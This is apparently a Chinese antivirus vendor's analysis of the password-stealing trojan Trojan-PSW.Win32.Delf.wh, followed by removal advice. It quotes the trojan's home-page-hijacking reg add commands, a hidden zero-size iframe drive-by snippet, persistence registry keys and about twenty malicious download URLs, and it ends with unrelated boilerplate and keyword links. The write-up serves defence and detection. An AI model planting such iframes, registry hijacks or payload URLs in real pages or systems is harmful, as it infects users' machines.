Trojan-PSW.Win32.Delf.wh

据超级巡警团队监测与收集的信息，网马.生成器的泛滥与中小型网站的安全机制不健全，使得大量网页木马危害网友们的正常网络生活。形成了“挂马网站多，下载木马多，木马变种多”的“三多现象”。超级巡警团队提示网友要提高安全意识、加强计算机安全

机制。

一、病毒相关分析：

病毒标签：

病毒名称：Trojan-PSW.Win32.Delf.wh

病毒类型：木马

危害级别：2

感染平台：Windows 平台

病毒大小：16,944 字节

SHA1：251f2fc974065a5da44ca4525efb419d7b3a0a54

加壳类型：UPX //修改过

开发工具：Borland Delphi 6.0 - 7.0

病毒分析：

1、文件运行后会.释放一个bat文件

%temp%2443954.bat

2443954.bat会执行指令Set date=%date%和date 1987-10-18修改系统时间

并多次带参数执行ping 127.0.0.1//可能是为了屏蔽防火墙

2、调用reg.exe修改IE主页与默认页为http://www.94ak.com//该网站已被挂马

reg add "HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMain" /v "Start Page" /t

REG_SZ /d "http://www.94ak.com" /f

reg add "HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMain" /v "Default_Page_URL" /t

REG_SZ /d "http://www.94ak.com" /f

3、网站http://www.94ak.com挂马代码：

<iframe src=http://www.851733.cn/htm/wm/wm2.htm width=0 height=0></iframe>

4、http://www.851733.cn/htm/wm/wm1.htm

http://www.851733.cn/htm/wm/wm2.htm

http://www.851733.cn/htm/wm/wm3.htm

均为经过加密处理的网页木马，通过它们下载其他木马文件。三个网页的免杀方式相同，不同的地方只是不同的网

页使用了不同的变量名及下载文件.的地址。用网马生成器或改变一下变.量名，就可以轻松改造出大量网马。

http://www.851733.cn/htm/down.exe16,944 字节

http://www.851733.cn/htm/vip.exe16,944 字节

均为同一文件，文件MD5值相同

5、下载文件.运行后释放文件：

%Program Files%Internet ExplorerPLUGINSNewTemp.dll 10,800 字节

%Program Files%Internet ExplorerPLUGINSNewTemp.bak 16,944 字节

并将NewTemp.dll注入到所有正在运行中的进程，然后下载以下文件

http://down.851733.cn/1.exe91,648 字节

http://down.851733.cn/2.exe11,396 字节

http://down.851733.cn/3.exe15,360 字节

http://down.851733.cn/4.exe28,369 字节

http://down.851733.cn/5.exe11,742 字节

http://down.851733.cn/6.exe33,395 字节

http://down.851733.cn/7.exe10,240 字节

http://down.851733.cn/8.exe14,940 字节

http://down.851733.cn/9.exe14,600 字节

http://down.851733.cn/10.exe24,977 字节

http://down.851733.cn/11.exe16,788 字节

http://down.851733.cn/12.exe38,032 字节

http://down.851733.cn/13.exe13,416 字节

http://down.851733.cn/14.exe180,169 字节

http://down.851733.cn/15.exe12,457 字节

http://down.851733.cn/16.exe13,832 字节

http://down.851733.cn/17.exe12,068 字节

http://down.851733.cn/18.exe22,244 字节

http://down.851733.cn/19.exe193,901 字节

http://down.851733.cn/20.exe16,272 字节

6、注册表.操作：

注册表键： HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks

注册表值： {0EA66AD2-CF26-2E23-532B-B292E22F3266}

类型： REG_SZ

注册表键： HKCRCLSID{0EA66AD2-CF26-2E23-532B-B292E22F3266}InProcServer32

注册表值： （默认）

类型： REG_SZ

值： C:Program FilesInternet ExplorerPLUGINSNewTemp.dll

二、解决方案

自动查杀：

1、升级超级巡警到最新病毒库，并进行全盘扫描。

2、如无特殊需要，使用超级巡警屏蔽网站www.94ak.com与down.851733.cn。

三、安全建议

1、立即安装或更新防病毒软件并对内存和硬盘全面扫描(推荐安装超级巡警)。

2、使用超级巡警的补丁检查功能，检查系.统补丁，并及时安装补丁。

3、不要随便共享文件或文件夹，即使要使用共享，应先设置好权限，另外不建议设置可写或可控制。

4、不要随便打开不明来历的电子邮件，尤其是邮件附件。

5、不要随便登陆不明网站，特别不要随意登陆需要自己银行帐号或手机及计算机系统帐号的不明网站。

6、使用移动存储介质进行数据访问时，先对其进行病毒检查，建议使用超级巡警U盘免疫器进行免疫。

7、做好系统和重要数据的备份，以便能够进行系统和数据灾难恢复。

Currently there is no description available for this program. 字串2

As many viruses and worms are modifications of earlier versions, it may help you to check the descriptions of similar programs. If such descriptions are available, they will be listed at the top of the page.

Our virus analysts work hard to ensure that descriptions of the commonest and most potentially dangerous software are available to users. The Virus Encyclopedia is updated on a regular basis.

大部分国外杀毒软件已能查杀。

• ·接触氧化除铁
• ·V形滤池
• ·普通快滤池
• ·高州学校
• ·表面扫洗
• ·艾泰
• ·CDCE
• ·CDAA
• ·勇敢的人
• ·小运转列车